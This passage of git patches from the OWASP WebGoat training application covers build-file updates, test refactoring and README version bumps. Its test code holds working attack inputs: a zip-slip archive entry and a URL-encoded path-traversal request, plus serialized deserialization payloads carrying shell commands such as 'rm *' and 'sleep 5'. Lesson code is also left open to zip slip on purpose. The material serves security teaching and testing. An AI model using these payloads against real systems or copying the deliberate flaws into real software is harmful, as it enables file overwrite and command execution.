         <lombok.version>1.18.20</lombok.version>
+        <wiremock.version>2.27.2</wiremock.version>
         <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
         <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
         <maven-jar-plugin.version>3.1.2</maven-jar-plugin.version>
         <maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version>
         <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
-        <maven-surefire-plugin.version>3.0.0-M4</maven-surefire-plugin.version>
+        <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
         <java.version>15</java.version>
     </properties>
 
diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml
index ea83551ce..25cd764a3 100644
--- a/webgoat-container/pom.xml
+++ b/webgoat-container/pom.xml
@@ -17,13 +17,7 @@
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-surefire-plugin</artifactId>
-                <configuration>
-                    <forkCount>0</forkCount>
-                    <reuseForks>true</reuseForks>
-                    <argLine>
-                        --illegal-access=permit
-                    </argLine>
-                </configuration>
+                <version>${maven-surefire-plugin.version}</version>
             </plugin>
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
@@ -70,7 +64,7 @@
         <dependency>
             <groupId>org.asciidoctor</groupId>
             <artifactId>asciidoctorj</artifactId>
-            <version>2.4.3</version>
+            <version>${asciidoctorj.version}</version>
         </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
diff --git a/webgoat-integration-tests/pom.xml b/webgoat-integration-tests/pom.xml
index abd0f8e10..ff665b923 100644
--- a/webgoat-integration-tests/pom.xml
+++ b/webgoat-integration-tests/pom.xml
@@ -10,17 +10,17 @@
     </parent>
 
     <dependencies>
-    	<dependency>
+        <dependency>
             <groupId>org.seleniumhq.selenium</groupId>
-	    <artifactId>selenium-java</artifactId>
-	    <scope>test</scope>
-	</dependency>
-	<dependency>
-    	<groupId>io.github.bonigarcia</groupId>
-    	<artifactId>webdrivermanager</artifactId>
-    	<version>4.3.1</version>
-    	<scope>test</scope>
-	</dependency>
+            <artifactId>selenium-java</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>io.github.bonigarcia</groupId>
+            <artifactId>webdrivermanager</artifactId>
+            <version>4.3.1</version>
+            <scope>test</scope>
+        </dependency>
         <dependency>
             <groupId>org.owasp.webgoat</groupId>
             <artifactId>webgoat-server</artifactId>
@@ -43,16 +43,16 @@
             <artifactId>webwolf</artifactId>
             <version>${project.version}</version>
         </dependency>
-		<dependency>
-			<groupId>org.springframework.boot</groupId>
-			<artifactId>spring-boot-starter-test</artifactId>
-			<scope>test</scope>
-		</dependency>
-		<dependency>
-			<groupId>io.rest-assured</groupId>
-			<artifactId>rest-assured</artifactId>
-			<scope>test</scope>
-		</dependency>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>io.rest-assured</groupId>
+            <artifactId>rest-assured</artifactId>
+            <scope>test</scope>
+        </dependency>
     </dependencies>
 
     <build>
@@ -62,14 +62,12 @@
                 <artifactId>maven-surefire-plugin</artifactId>
                 <version>${maven-surefire-plugin.version}</version>
                 <configuration>
-                    <forkCount>0</forkCount>
-                    <reuseForks>true</reuseForks>
+                    <!-- Otherwise test will fail with JDK16 -->
                     <argLine>
-                        --illegal-access=permit
+                        --add-opens java.base/java.lang=ALL-UNNAMED --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.beans=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED --add-opens java.base/sun.nio.ch=ALL-UNNAMED
                     </argLine>
                 </configuration>
             </plugin>
         </plugins>
     </build>
-
 </project>
diff --git a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalTest.java b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java
similarity index 87%
rename from webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalTest.java
rename to webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java
index d32ce336e..753b193d3 100644
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/PathTraversalITTest.java
@@ -24,9 +24,8 @@ import java.util.zip.ZipOutputStream;
 
 import static org.junit.jupiter.api.DynamicTest.dynamicTest;
 
-public class PathTraversalTest extends IntegrationTest {
+class PathTraversalITTest extends IntegrationTest {
 
-    //the JUnit5 way
     @TempDir
     Path tempDir;
 
@@ -35,8 +34,7 @@ public class PathTraversalTest extends IntegrationTest {
     @BeforeEach
     @SneakyThrows
     public void init() {
-        fileToUpload = Files.createFile(
-                tempDir.resolve("test.jpg")).toFile();
+        fileToUpload = Files.createFile(tempDir.resolve("test.jpg")).toFile();
         Files.write(fileToUpload.toPath(), "This is a test".getBytes());
         startLesson("PathTraversal");
     }
@@ -52,7 +50,7 @@ public class PathTraversalTest extends IntegrationTest {
         );
     }
 
-    public void assignment1() throws IOException {
+    private void assignment1() throws IOException {
         MatcherAssert.assertThat(
                 RestAssured.given()
                         .when()
@@ -66,7 +64,7 @@ public class PathTraversalTest extends IntegrationTest {
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
     }
 
-    public void assignment2() throws IOException {
+    private void assignment2() throws IOException {
         MatcherAssert.assertThat(
                 RestAssured.given()
                         .when()
@@ -80,7 +78,7 @@ public class PathTraversalTest extends IntegrationTest {
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
     }
 
-    public void assignment3() throws IOException {
+    private void assignment3() throws IOException {
         MatcherAssert.assertThat(
                 RestAssured.given()
                         .when()
@@ -93,7 +91,7 @@ public class PathTraversalTest extends IntegrationTest {
                         .extract().path("lessonCompleted"), CoreMatchers.is(true));
     }
 
-    public void assignment4() throws IOException {
+    private void assignment4() throws IOException {
         var uri = "/WebGoat/PathTraversal/random-picture?id=%2E%2E%2F%2E%2E%2Fpath-traversal-secret";
         RestAssured.given().urlEncodingEnabled(false)
                 .when()
@@ -102,17 +100,17 @@ public class PathTraversalTest extends IntegrationTest {
                 .get(uri)
                 .then()
                 .statusCode(200)
-                .content(CoreMatchers.is("You found it submit the SHA-512 hash of your username as answer"));
+                .body(CoreMatchers.is("You found it submit the SHA-512 hash of your username as answer"));
 
         checkAssignment("/WebGoat/PathTraversal/random", Map.of("secret", Sha512DigestUtils.shaHex(getWebgoatUser())), true);
     }
 
-    public void assignment5() throws IOException {
-        var webGoatHome = System.getProperty("user.dir") + "/target/.webgoat/PathTraversal/" + getWebgoatUser();
+    private void assignment5() throws IOException {
+        var webGoatHome = System.getProperty("java.io.tmpdir") + "/webgoat/PathTraversal/" + getWebgoatUser();
         webGoatHome = webGoatHome.replaceAll("^[a-zA-Z]:", ""); //Remove C: from the home directory on Windows
 
         var webGoatDirectory = new File(webGoatHome);
-        var zipFile = new File(webGoatDirectory, "upload.zip");
+        var zipFile = new File(tempDir.toFile(), "upload.zip");
         try (var zos = new ZipOutputStream(new FileOutputStream(zipFile))) {
             ZipEntry e = new ZipEntry("../../../../../../../../../../" + webGoatDirectory.toString() + "/image.jpg");
             zos.putNextEntry(e);
@@ -132,7 +130,7 @@ public class PathTraversalTest extends IntegrationTest {
     }
 
     @AfterEach
-    public void shutdown() {
+    void shutdown() {
         //this will run only once after the list of dynamic tests has run, this is to test if the lesson is marked complete
         checkResults("/PathTraversal");
     }
diff --git a/webgoat-integration-tests/src/test/resources/application-inttest.properties b/webgoat-integration-tests/src/test/resources/application-inttest.properties
index 4286e914f..a694bd592 100644
--- a/webgoat-integration-tests/src/test/resources/application-inttest.properties
+++ b/webgoat-integration-tests/src/test/resources/application-inttest.properties
@@ -1,9 +1,9 @@
 #In order to run tests a known temp directory is preferred
 #that is why these values are used
 
-webgoat.user.directory=${user.dir}/target/.webgoat
-webgoat.server.directory=${user.dir}/target/.webgoat
-webwolf.fileserver.location=${user.dir}/target/webwolf-fileserver
+webgoat.user.directory=${java.io.tmpdir}/webgoat
+webgoat.server.directory=${java.io.tmpdir}/webgoat
+webwolf.fileserver.location=${java.io.tmpdir}/webwolf-fileserver
 
 #database will get deleted for every mvn clean install
 #as these extra properties are read by WebGoat and WebWolf the drop of the tables 
diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml
index bc82c23fa..5bb02a9f2 100644
--- a/webgoat-lessons/cross-site-scripting/pom.xml
+++ b/webgoat-lessons/cross-site-scripting/pom.xml
@@ -16,28 +16,4 @@
             <version>1.14.2</version>
         </dependency>
     </dependencies>
-    <build>
-       <plugins>
-           <plugin>
-               <groupId>org.asciidoctor</groupId>
-               <artifactId>asciidoctor-maven-plugin</artifactId>
-               <version>1.5.3</version>
-
-               <executions>
-                   <execution>
-                       <id>output-html</id>
-                       <phase>generate-resources</phase>
-                       <goals>
-                           <goal>process-asciidoc</goal>
-                       </goals>
-                       <configuration>
-                           <backend>html</backend>
-                           <sourceDirectory>src/main/resources/lessonPlans/en/</sourceDirectory>
-                       </configuration>
-                   </execution>
-
-               </executions>
-           </plugin>
-       </plugins>
-   </build>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java b/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
index 9a2ecec94..35ba51976 100644
--- a/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
+++ b/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
@@ -18,11 +18,11 @@ import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standal
 @ExtendWith(MockitoExtension.class)
 public class DeserializeTest extends AssignmentEndpointTest {
 
-	private MockMvc mockMvc;
-	
-	private static String OS = System.getProperty("os.name").toLowerCase();
-	
-	@BeforeEach
+    private MockMvc mockMvc;
+
+    private static String OS = System.getProperty("os.name").toLowerCase();
+
+    @BeforeEach
     public void setup() {
         InsecureDeserializationTask insecureTask = new InsecureDeserializationTask();
         init(insecureTask);
@@ -31,62 +31,60 @@ public class DeserializeTest extends AssignmentEndpointTest {
 
     @Test
     public void success() throws Exception {
-    	if (OS.indexOf("win")>-1) {
-    		mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
+        if (OS.indexOf("win") > -1) {
+            mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                     .header("x-request-intercepted", "true")
                     .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "ping localhost -n 5"))))
-            		.andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    	} else {
-    		mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
-                .header("x-request-intercepted", "true")
-                .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "sleep 5"))))
-        		.andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
-    	}
+                    .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
+        } else {
+            mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
+                    .header("x-request-intercepted", "true")
+                    .param("token", SerializationHelper.toString(new VulnerableTaskHolder("wait", "sleep 5"))))
+                    .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(true)));
+        }
     }
-    
+
     @Test
     public void fail() throws Exception {
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .header("x-request-intercepted", "true")
                 .param("token", SerializationHelper.toString(new VulnerableTaskHolder("delete", "rm *"))))
-        		.andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
+                .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-    
+
     @Test
     public void wrongVersion() throws Exception {
-    	String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAECAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4GIQgMLRSoeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
+        String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAECAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4GIQgMLRSoeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .header("x-request-intercepted", "true")
                 .param("token", token))
-        		.andExpect(status().isOk())
+                .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.invalidversion"))))
-        		.andExpect(jsonPath("$.lessonCompleted", is(false)));
+                .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-    
+
     @Test
     public void expiredTask() throws Exception {
-    	String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4IDC0YfvNIeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
+        String token = "rO0ABXNyADFvcmcuZHVtbXkuaW5zZWN1cmUuZnJhbWV3b3JrLlZ1bG5lcmFibGVUYXNrSG9sZGVyAAAAAAAAAAICAANMABZyZXF1ZXN0ZWRFeGVjdXRpb25UaW1ldAAZTGphdmEvdGltZS9Mb2NhbERhdGVUaW1lO0wACnRhc2tBY3Rpb250ABJMamF2YS9sYW5nL1N0cmluZztMAAh0YXNrTmFtZXEAfgACeHBzcgANamF2YS50aW1lLlNlcpVdhLobIkiyDAAAeHB3DgUAAAfjCR4IDC0YfvNIeHQACmVjaG8gaGVsbG90AAhzYXlIZWxsbw";
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .header("x-request-intercepted", "true")
                 .param("token", token))
-        		.andExpect(status().isOk())
+                .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.expired"))))
-        		.andExpect(jsonPath("$.lessonCompleted", is(false)));
+                .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-    
 
-    
+
     @Test
     public void checkOtherObject() throws Exception {
-    	String token = "rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l";
-    	mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
+        String token = "rO0ABXQAVklmIHlvdSBkZXNlcmlhbGl6ZSBtZSBkb3duLCBJIHNoYWxsIGJlY29tZSBtb3JlIHBvd2VyZnVsIHRoYW4geW91IGNhbiBwb3NzaWJseSBpbWFnaW5l";
+        mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .header("x-request-intercepted", "true")
                 .param("token", token))
-        		.andExpect(status().isOk())
+                .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.stringobject"))))
-        		.andExpect(jsonPath("$.lessonCompleted", is(false)));
+                .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-    
-    
+
 
 }
\ No newline at end of file
diff --git a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java b/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java
index 7bf9239bf..e119a1f4e 100644
--- a/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java
+++ b/webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat/path_traversal/ProfileZipSlip.java
@@ -7,14 +7,12 @@ import org.owasp.webgoat.session.WebSession;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.http.ResponseEntity;
 import org.springframework.util.FileCopyUtils;
-import org.springframework.util.FileSystemUtils;
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.multipart.MultipartFile;
 
 import java.io.File;
 import java.io.IOException;
 import java.io.InputStream;
-import java.nio.file.CopyOption;
 import java.nio.file.Files;
 import java.nio.file.StandardCopyOption;
 import java.util.Arrays;
@@ -45,22 +43,21 @@ public class ProfileZipSlip extends ProfileUploadBase {
 
     @SneakyThrows
     private AttackResult processZipUpload(MultipartFile file) {
-        var tmpZipDirectory = new File(getWebGoatHomeDirectory(), "/PathTraversal/zip-slip/" + getWebSession().getUserName());
+        var tmpZipDirectory = Files.createTempDirectory(getWebSession().getUserName());
         var uploadDirectory = new File(getWebGoatHomeDirectory(), "/PathTraversal/" + getWebSession().getUserName());
-        FileSystemUtils.deleteRecursively(uploadDirectory);
-        Files.createDirectories(tmpZipDirectory.toPath());
+        var currentImage = getProfilePictureAsBase64();
+
         Files.createDirectories(uploadDirectory.toPath());
-        byte[] currentImage = getProfilePictureAsBase64();
 
         try {
-            var uploadedZipFile = new File(tmpZipDirectory, file.getOriginalFilename());
-            FileCopyUtils.copy(file.getBytes(), uploadedZipFile);
+            var uploadedZipFile = tmpZipDirectory.resolve(file.getOriginalFilename());
+            FileCopyUtils.copy(file.getBytes(), uploadedZipFile.toFile());
 
-            ZipFile zip = new ZipFile(uploadedZipFile);
+            ZipFile zip = new ZipFile(uploadedZipFile.toFile());
             Enumeration<? extends ZipEntry> entries = zip.entries();
             while (entries.hasMoreElements()) {
                 ZipEntry e = entries.nextElement();
-                File f = new File(uploadDirectory, e.getName());
+                File f = new File(tmpZipDirectory.toFile(), e.getName());
                 InputStream is = zip.getInputStream(e);
                 Files.copy(is, f.toPath(), StandardCopyOption.REPLACE_EXISTING);
             }
diff --git a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
index dc55affce..bb909b1d8 100644
--- a/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
+++ b/webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en/PathTraversal_zip_slip_solution.adoc
@@ -8,7 +8,7 @@ curl -o cat.jpg http://localhost:8080/WebGoat/images/cats/1.jpg
 zip profile.zip cat.jpg
 ----
 
-Now let's upload this as our profile image, we can see nothing happens as mentioned in the assignment there is a bug in the software and the result we see on the screen is:
+Now let's upload this as our profile image, we can see nothing happens as mentioned in the assignment there is a bug in the software, and the result we see on the screen is:
 
 [source]
 ----
diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml
index f16525506..7bc052d21 100644
--- a/webgoat-lessons/vulnerable-components/pom.xml
+++ b/webgoat-lessons/vulnerable-components/pom.xml
@@ -35,4 +35,20 @@
             <version>1.2</version>
         </dependency>
     </dependencies>
+
+    <build>
+        <plugins>
+            <plugin>
+                <groupId>org.apache.maven.plugins</groupId>
+                <artifactId>maven-surefire-plugin</artifactId>
+                <version>${maven-surefire-plugin.version}</version>
+                <configuration>
+                    <!-- Otherwise test will fail with JDK16 -->
+                    <argLine>
+                        --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED
+                    </argLine>
+                </configuration>
+            </plugin>
+        </plugins>
+    </build>
 </project>
diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml
index 758b560f1..856f225c4 100644
--- a/webgoat-lessons/xxe/pom.xml
+++ b/webgoat-lessons/xxe/pom.xml
@@ -11,21 +11,20 @@
 
     <dependencies>
         <dependency>
-            <groupId>commons-lang</groupId>
-            <artifactId>commons-lang</artifactId>
-            <version>2.6</version>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-lang3</artifactId>
+            <version>${commons-lang3.version}</version>
         </dependency>
         <dependency>
             <groupId>org.glassfish.jaxb</groupId>
             <artifactId>jaxb-runtime</artifactId>
-            <version>2.3.0</version>
         </dependency>
 
         <dependency>
             <groupId>com.github.tomakehurst</groupId>
             <artifactId>wiremock</artifactId>
-            <version>2.27.2</version>
-        <scope>test</scope>
+            <scope>test</scope>
+            <version>${wiremock.version}</version>
         </dependency>
 
     </dependencies>
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
index c627d727f..4283c2895 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/ContentTypeAssignment.java
@@ -23,6 +23,7 @@
 package org.owasp.webgoat.xxe;
 
 import org.apache.commons.exec.OS;
+import org.apache.commons.lang3.exception.ExceptionUtils;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AttackResult;
@@ -67,17 +68,17 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
         if (null != contentType && contentType.contains(MediaType.APPLICATION_XML_VALUE)) {
             String error = "";
             try {
-            	boolean secure = false;
-            	if (null != request.getSession().getAttribute("applySecurity")) {
-            		secure = true;
-            	}
+                boolean secure = false;
+                if (null != request.getSession().getAttribute("applySecurity")) {
+                    secure = true;
+                }
                 Comment comment = comments.parseXml(commentStr, secure);
                 comments.addComment(comment, false);
                 if (checkSolution(comment)) {
                     attackResult = success(this).build();
                 }
             } catch (Exception e) {
-                error = org.apache.commons.lang.exception.ExceptionUtils.getFullStackTrace(e);
+                error = ExceptionUtils.getStackTrace(e);
                 attackResult = failed(this).feedback("xxe.content.type.feedback.xml").output(error).build();
             }
         }
@@ -85,13 +86,13 @@ public class ContentTypeAssignment extends AssignmentEndpoint {
         return attackResult;
     }
 
-   private boolean checkSolution(Comment comment) {
-       String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
-       boolean success = false;
-       for (String directory : directoriesToCheck) {
-           success |= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
-       }
-       return success;
-   } 
+    private boolean checkSolution(Comment comment) {
+        String[] directoriesToCheck = OS.isFamilyMac() || OS.isFamilyUnix() ? DEFAULT_LINUX_DIRECTORIES : DEFAULT_WINDOWS_DIRECTORIES;
+        boolean success = false;
+        for (String directory : directoriesToCheck) {
+            success |= org.apache.commons.lang3.StringUtils.contains(comment.getText(), directory);
+        }
+        return success;
+    }
 
 }
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
index 30930c97d..888bb25d3 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/SimpleXXE.java
@@ -23,7 +23,7 @@
 package org.owasp.webgoat.xxe;
 
 import org.apache.commons.exec.OS;
-import org.apache.commons.lang.exception.ExceptionUtils;
+import org.apache.commons.lang3.exception.ExceptionUtils;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AttackResult;
@@ -80,7 +80,7 @@ public class SimpleXXE extends AssignmentEndpoint {
                 return success(this).build();
             }
         } catch (Exception e) {
-            error = ExceptionUtils.getFullStackTrace(e);
+            error = ExceptionUtils.getStackTrace(e);
         }
         return failed(this).output(error).build();
     }

From 61f2bfa9ec70997f822567b4fa8e6e616f6ec4a6 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 25 Sep 2021 11:28:20 +0200
Subject: [PATCH 006/227] Added jdk badge

---
 README.MD | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.MD b/README.MD
index 3b0a76d43..bb2678219 100644
--- a/README.MD
+++ b/README.MD
@@ -3,6 +3,7 @@
 [![Build](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml/badge.svg)](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml)
 [![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
 [![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
+[![java-jdk](https://img.shields.io/badge/java%20jdk-15-green.svg)](https://jdk.java.net/)
 [![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)
 [![Gitter](https://badges.gitter.im/OWASPWebGoat/community.svg)](https://gitter.im/OWASPWebGoat/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)

From 1461263b607d2b180ae48ae36d054a7a7c7576c9 Mon Sep 17 00:00:00 2001
From: juoum <79800410+itsjuoum@users.noreply.github.com>
Date: Wed, 15 Sep 2021 19:45:24 +0100
Subject: [PATCH 007/227] Update WebGoat/GoatAndWolf version on the
 documentation to the latest

---
 README.MD | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/README.MD b/README.MD
index bb2678219..e5a8e4eda 100644
--- a/README.MD
+++ b/README.MD
@@ -38,7 +38,7 @@ The easiest way to start WebGoat as a Docker container is to use the all-in-one
 
 ```shell
 
-docker run -it -p 127.0.0.1:80:8888 -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf:v8.2.1
+docker run -it -p 127.0.0.1:80:8888 -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amsterdam webgoat/goatandwolf:v8.2.2
 ```
 
 The landing page will be located at: http://localhost  
@@ -55,8 +55,8 @@ WebWolf will be located at: http://localhost:9090/WebWolf
 Download the latest WebGoat and WebWolf release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -jar webgoat-server-8.2.1.jar [--server.port=8080] [--server.address=localhost] [--hsqldb.port=9001]
-java -Dfile.encoding=UTF-8 -jar webwolf-8.2.1.jar [--server.port=9090] [--server.address=localhost] [--hsqldb.port=9001]
+java -Dfile.encoding=UTF-8 -jar webgoat-server-8.2.2.jar [--server.port=8080] [--server.address=localhost] [--hsqldb.port=9001]
+java -Dfile.encoding=UTF-8 -jar webwolf-8.2.2.jar [--server.port=9090] [--server.address=localhost] [--hsqldb.port=9001]
 ```
 
 WebGoat will be located at: http://localhost:8080/WebGoat and   
@@ -107,7 +107,7 @@ For instance running as a jar on a Linux/macOS it will look like this:
 ```Shell
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
-java -jar webgoat-server/target/webgoat-server-v8.2.0-SNAPSHOT.jar
+java -jar webgoat-server/target/webgoat-server-v8.2.2-SNAPSHOT.jar
 ```
 Or in a docker run it would (once this version is pushed into docker hub) look like this:
 ```Shell

From 9403bbb8517e9e0601510fb38058bedc06ed21ef Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Wed, 29 Sep 2021 09:40:45 +0200
Subject: [PATCH 008/227] Cleaned up pom, added simple quality test action on
 push usable for forks of the repo

---
 .github/workflows/build.yml          |  4 +--
 .github/workflows/quality_checks.yml | 52 ++++++++++++++++++++++++++++
 .github/workflows/rebase.yml         |  2 +-
 .github/workflows/release.yml        |  2 ++
 .github/workflows/welcome.yml        |  1 +
 pom.xml                              |  5 ---
 6 files changed, 58 insertions(+), 8 deletions(-)
 create mode 100644 .github/workflows/quality_checks.yml

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
